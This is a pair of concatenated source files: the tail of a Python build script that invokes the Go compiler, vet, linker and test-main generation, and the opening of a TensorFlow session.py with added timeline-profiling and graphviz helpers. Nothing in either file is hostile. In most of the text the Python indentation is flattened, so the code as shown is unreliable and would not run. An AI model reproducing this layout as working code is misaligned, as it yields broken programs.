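#   importmap <unvendored-import-path>=<full-import-path>
#   packagefile <import-path>=<path/to/compiled/package.a>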
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
    # FIXME(snermolaev): it seems that adding an import map entry for the 'fake'
    # package doesn't do any harm (this needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
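# Expected input shape (illustrative, based on the `go vet -json` output consumed
# above):
#   {
#     "<package>": {
#       "<analyzer>": [ {"posn": "file.go:12:3", "message": "..."}, ... ]
#     }
#   }
# decode_vet_report() flattens this into sorted "posn: message" lines; anything
# that is not valid JSON is passed through verbatim.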
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
if compare_versions('1.12', args.goversion) >= 0:
if args.symabis:
cmd += ['-symabis'] + args.symabis
if compare_versions('1.13', args.goversion) >= 0:
pass
elif import_path in ('runtime', 'runtime/internal/atomic'):
cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if import_path == 'runtime' or import_path.startswith('runtime/'):
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
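# A representative compiler invocation assembled above (paths, version and file
# names are illustrative only):
#
#   <go_compile> -o pkg.a -p some/import/path -D "" -goversion go1.13 \
#       -importcfg /tmp/tmpXXXXXX -pack -c=4 a.go b.go
#
# '-std' and '-+' are added for standard-library and runtime packages, while
# '-complete' is used only when there is no import config, the package is not
# 'unsafe', and there are no extra objects or assembly header.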
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
        # Keep every flag by default; under musl we link statically and drop the
        # dynamic libc-related flags below.
        filter_musl = bool
        if args.musl:
            cmd.append('-linkmode=external')
            extldflags.append('-static')
            filter_musl = lambda x: x not in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
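# Illustrative example of the filtering above (test names are made up):
#
#   filter_out_skip_tests(['TestFoo', 'TestBar', 'BenchmarkBaz'], ['TestB*'])
#   -> ['TestFoo', 'BenchmarkBaz']
#
# Patterns containing '*' are compiled into the anchored regex '^(TestB.*)$';
# all other entries are matched literally.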
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
        ' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)',
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
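# Rough sketch of the generated _test_main.go produced above (import paths and
# test names are illustrative; 'os' and os.Exit are emitted only when the
# package defines no TestMain):
#
#   package main
#
#   import (
#       "os"
#       "testing"
#       "testing/internal/testdeps"
#       _test "some/module/path"
#   )
#
#   var tests = []testing.InternalTest{
#       {"TestFoo", _test.TestFoo},
#   }
#   var benchmarks = []testing.InternalBenchmark{}
#   var examples = []testing.InternalExample{}
#
#   func main() {
#       m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)
#       os.Exit(m.Run())
#   }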
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
        # It seems we could do this unconditionally, but this kind of mangling
        # doesn't really look good, so it is only applied to pure GO_TEST modules.
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
# Support @response-file notation for windows to reduce cmd length
if sys.argv[1].startswith('@'):
with open(sys.argv[1][1:]) as afile:
args = afile.read().splitlines()
sys.argv[:] = [sys.argv[0]] + args + sys.argv[2:]
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
args = parser.parse_args()
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
    # We currently support the 'exe', 'dll', 'lib' and 'test' build modes and
    # generate only one build node per module (or program).
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
import tensorflow as tf
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import object_identity
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
#fareed
import os
import json
from graphviz import Digraph
from graphviz import Source
from tensorflow.python.client import timeline
the_settings_file_was_read = False
training_itr = 0
profile = False
profiling_path = ''
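# The profiling hooks below read a settings file from $PARDNN_DIR (the value is
# concatenated directly with 'settings.json', so it should end with a path
# separator). A minimal settings.json matching the keys accessed in run() would
# look something like:
#
#   {
#     "profile": 1,
#     "profiling_path": "/tmp/pardnn_profiles/"
#   }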
def _profile(run_metadata, epoch=0):
  """Writes a Chrome-trace timeline for one step into the profiling directory."""
  with open(profiling_path + 'timeline_step' + str(epoch) + '.json', 'w') as f:
    # Create the Timeline object and dump it in Chrome trace format.
    fetched_timeline = timeline.Timeline(run_metadata.step_stats)
    chrome_trace = fetched_timeline.generate_chrome_trace_format()
    f.write(chrome_trace)
def graph_to_dot(graph):
  """Builds a graphviz Digraph with one node per op and one edge per input."""
  dot = Digraph()
  for n in graph.as_graph_def().node:
    dot.node(n.name, label=n.name)
    for i in n.input:
      dot.edge(i, n.name)
  return dot
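# Illustrative use of the helper above: run() periodically writes
# str(graph_to_dot(...)) to '<profiling_path>mtf_dot.dot'; the Source import can
# also render the digraph directly, e.g. (output path is hypothetical):
#
#   dot = graph_to_dot(tf.get_default_graph())
#   Source(str(dot)).render('/tmp/tf_graph', format='pdf')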
#end fareed
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
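# Illustrative walk-through of the expansion table above: for a fetch that is a
# sparse_tensor.SparseTensor `sp`, the registered fetch_fn returns
# ([sp.indices, sp.values, sp.dense_shape], <rebuild SparseTensorValue>), so the
# low-level run sees three dense tensors while the caller still receives a
# single SparseTensorValue.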
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
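# Dispatch summary for the factory above (a reading aid, not new behavior):
#   list / tuple / namedtuple  -> _ListFetchMapper
#   Mapping (e.g. dict)        -> _DictFetchMapper
#   attrs-decorated instance   -> _AttrsFetchMapper
#   anything else              -> _ElementFetchMapper via _REGISTERED_EXPANSIONS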
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
